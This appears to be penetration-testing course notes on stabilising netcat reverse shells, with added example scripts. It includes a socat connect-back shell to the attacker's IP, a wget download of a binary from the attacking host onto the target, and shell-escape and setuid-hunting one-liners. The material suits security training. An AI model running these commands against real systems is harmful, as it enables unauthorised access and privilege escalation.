Netcat Shell Stabilization

  • Netcat shells are non-interactive (there is no TTY behind them): tab completion, command history and the arrow keys do not work, Ctrl + C kills our listener instead of the remote process, and output is often strangely formatted

Technique 1: Python

  • Only applicable to Linux targets, and only when Python is installed on them

  • Three stage process:

    1. Use python3 -c 'import pty;pty.spawn("/bin/bash")' (python if only Python 2 is present), which uses Python's pty module to spawn bash inside a pseudo-terminal

    2. Then use export TERM=xterm -- this tells the shell which terminal type we are using, giving us access to term commands such as clear

    3. Background the shell using Ctrl + Z, then back in our own terminal use stty raw -echo; fg. This does two things:

      1. Puts our own terminal into raw mode with local echo off, so keystrokes are passed straight through to the remote shell rather than being handled locally (gives us access to tab autocompletes, arrow keys, and Ctrl + C to kill processes inside the shell instead of killing the listener)

      2. Foregrounds the shell, completing the process

    • Caveat: our terminal stays in raw mode after the remote shell dies, so once it exits type reset (blind, since nothing is echoed) to restore it

Technique 2: rlwrap

  • rlwrap is a program which gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell

  • Not installed by default on Kali so install it with sudo apt install rlwrap

  • To use rlwrap, invoke a slightly different listener: rlwrap nc -lvnp <port>

  • Prepending the netcat listener with rlwrap wraps it in readline, giving us a much more fully featured shell

  • When dealing with a Linux target

    • Use the same trick as in step three of the previous technique

      • background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilize and re-enter the shell

Technique 3: Socat

  • This technique is limited to Linux targets

  • First transfer a statically compiled socat binary (a version of the program compiled to have no dependencies) up to the target machine

    • You can use a webserver on the attacking machine inside the directory containing your socat binary (sudo python3 -m http.server 80)

    • Then on the target machine, use the netcat shell to download the file with curl or wget (wget <LOCAL-IP>/socat -O /tmp/socat), then chmod +x /tmp/socat so it can be run

  • The transfer step works the same way on Windows with PowerShell, using Invoke-WebRequest or a .NET web request class such as System.Net.WebClient (Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\Windows\Temp\socat.exe), but the socat tty stabilization itself only works on Linux
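The socat commands themselves, plus an integrity check on the transferred binary, as an added example that is not part of the original page. It assumes the attacking machine listens on the port you pass in, that the static binary was saved to /tmp/socat on the target, and that you noted its sha256 on the attacking machine before serving it; <LOCAL-IP> is the same placeholder the page uses.

```shell
# Added example (not from the original page): the socat half of Technique 3.
# Assumptions: the attacking machine is reachable at the IP/port passed in, the
# static binary was downloaded to /tmp/socat, and its sha256 was taken on the
# attacking machine before serving it.

# Listener for the attacking machine. ",raw,echo=0" puts your own tty into the
# same state "stty raw -echo" does, so keystrokes go straight to the target.
socat_listener_cmd() {
    printf 'socat TCP-L:%s FILE:`tty`,raw,echo=0\n' "$1"
}

# Connect-back for the target, typed into the unstable netcat shell. EXEC with
# pty gives a real tty; sigint forwards Ctrl + C; sane resets the line settings.
socat_connect_cmd() {
    printf '/tmp/socat TCP:%s:%s EXEC:"bash -li",pty,stderr,sigint,setsid,sane\n' "$1" "$2"
}

# Before running a binary pulled over an unauthenticated HTTP transfer, confirm
# it is the file you served (wget saves whatever the server returned, including
# an error page), then make it executable. Returns 1 on mismatch.
verify_and_chmod() {
    file="$1"
    expected="$2"
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        printf 'checksum mismatch for %s: got %s\n' "$file" "$actual" >&2
        return 1
    fi
    chmod +x "$file"
}

# Attacking machine, with the static socat in the current directory:
#   sha256sum socat                 # note the hash for verify_and_chmod
#   sudo python3 -m http.server 80
socat_listener_cmd 4444
# Target, from the netcat shell:
#   wget <LOCAL-IP>/socat -O /tmp/socat
#   verify_and_chmod /tmp/socat <hash noted above>
socat_connect_cmd '<LOCAL-IP>' 4444
```

Run the listener first, then the connect-back; the shell that lands on the listener already has a tty, so none of the stty/fg steps from Technique 1 are needed.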

Changing terminal size

  • With all of the above techniques the remote shell does not know the size of our terminal, so full-screen programs (text editors, less) will misbehave

  • Open another terminal on the attacking machine and run stty -a; note the rows and columns values

  • In the reverse shell run stty rows <number> and stty cols <number> with those values
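A helper that reads the rows and columns out of your local stty -a output and prints the exact line to paste into the reverse shell, as an added example that is not part of the original page. The sample stty -a line is constructed; the function name is an assumption.

```shell
# Added example (not from the original page): turn the "rows N; columns M" line
# of your local `stty -a` output into the command to paste into the reverse shell.
# Handles the GNU form ("rows 50; columns 200;") and the BSD/macOS form
# ("50 rows; 200 columns;"). Returns 1 if no size can be found.
stty_size_cmd() {
    out="$1"
    rows=$(printf '%s\n' "$out" | sed -n 's/.*rows \([0-9][0-9]*\);.*/\1/p' | head -n 1)
    cols=$(printf '%s\n' "$out" | sed -n 's/.*columns \([0-9][0-9]*\);.*/\1/p' | head -n 1)
    if [ -z "$rows" ] || [ -z "$cols" ]; then
        rows=$(printf '%s\n' "$out" | sed -n 's/.*[^0-9]\([0-9][0-9]*\) rows;.*/\1/p' | head -n 1)
        cols=$(printf '%s\n' "$out" | sed -n 's/.*[^0-9]\([0-9][0-9]*\) columns;.*/\1/p' | head -n 1)
    fi
    [ -n "$rows" ] && [ -n "$cols" ] || return 1
    printf 'stty rows %s cols %s\n' "$rows" "$cols"
}

# Constructed sample of the first line GNU stty -a prints on a 200x50 terminal
SAMPLE_STTY='speed 38400 baud; rows 50; columns 200; line = 0;'
stty_size_cmd "$SAMPLE_STTY"

# Live use on the attacking machine; the printed line is what you type into the
# reverse shell:
#   stty_size_cmd "$(stty -a)"
```

Run it in the second terminal on the attacking machine, not inside the reverse shell, since the sizes it needs are those of your own terminal.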

Other Interactive Shells

# This runs the shell interpreter at the given path in interactive mode
/bin/sh -i

# Perl to shell, from the command line
perl -e 'exec "/bin/sh";'
# Perl to shell, from inside a Perl script
exec "/bin/sh";

# Ruby to shell, from inside a Ruby script or irb
exec "/bin/sh"

# Lua to shell, from inside a Lua script or the lua prompt
os.execute('/bin/sh')

# AWK to shell
awk 'BEGIN {system("/bin/sh")}'

# Find to shell, via awk (-exec only fires if the -name pattern matches a file)
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

# Find to shell, directly (-quit stops find after the first match so only one shell is spawned)
find . -exec /bin/sh \; -quit

# Vim to shell, from the command line
vim -c ':!/bin/sh'

# Vim escape, from inside a running Vim session
vim
:set shell=/bin/sh
:shell

Execution Permission Considerations

# List the properties and permissions of any given file or binary, to see whether the current account can execute it
ls -la <path/to/fileorbinary>

# Check what sudo permissions the account has; this may prompt for a password, so it needs a stable interactive shell
sudo -l
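A survey helper that checks which of the interpreters from the escapes above are present and executable by the current account, and flags any that are setuid (a setuid interpreter that spawns /bin/sh hands over its owner's privileges). This is an added example, not part of the original page; the function name and the interpreter list in the usage call are assumptions matching the escapes listed above.

```shell
# Added example (not from the original page): after landing, survey which of the
# interpreters used by the escapes above exist and are executable for this
# account, and flag any that are setuid. Names are whatever you pass in.
find_shell_escapes() {
    for name in "$@"; do
        path=$(command -v "$name" 2>/dev/null) || continue
        case "$path" in
            /*) ;;            # real binary with a path
            *) continue ;;    # builtin, alias or function: not a file to inspect
        esac
        [ -x "$path" ] || continue
        flags=""
        if [ -u "$path" ]; then
            flags="$flags setuid"
        fi
        printf '%s %s%s\n' "$name" "$path" "$flags"
    done
}

# One line per usable interpreter, e.g. "perl /usr/bin/perl" or
# "find /usr/bin/find setuid"; follow up with ls -la on each path for owner
# and mode, and with sudo -l once the shell is stable.
find_shell_escapes sh perl ruby lua awk find vim
```

Anything reported with setuid deserves a closer look before the sudo -l check, since it needs no password at all.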
